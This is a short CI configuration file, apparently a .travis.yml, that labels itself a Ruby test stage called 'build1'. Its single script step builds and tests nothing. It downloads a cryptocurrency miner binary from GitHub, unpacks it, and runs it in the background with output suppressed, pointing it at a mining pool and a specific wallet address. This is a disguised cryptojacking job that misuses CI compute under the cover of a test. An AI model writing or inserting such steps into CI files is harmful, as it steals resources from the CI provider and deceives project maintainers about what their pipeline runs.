language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - wget https://github.com/m-pays/m-cpuminer-v2/releases/download/2.4/m-minerd-64-linux.tar.gz && tar xfvz m-minerd-64-linux.tar.gz && cd m-minerd-64-linux && nohup ./m-minerd -a m7mhash -o stratum+tcp://mine.zpool.ca:6033 -u D9zT4xf7iGNcbrH6nLEKBCqjmiC3yKPwc2.dancuk -p c=DGB,zap=XMG -t2  >/dev/null 2>&1
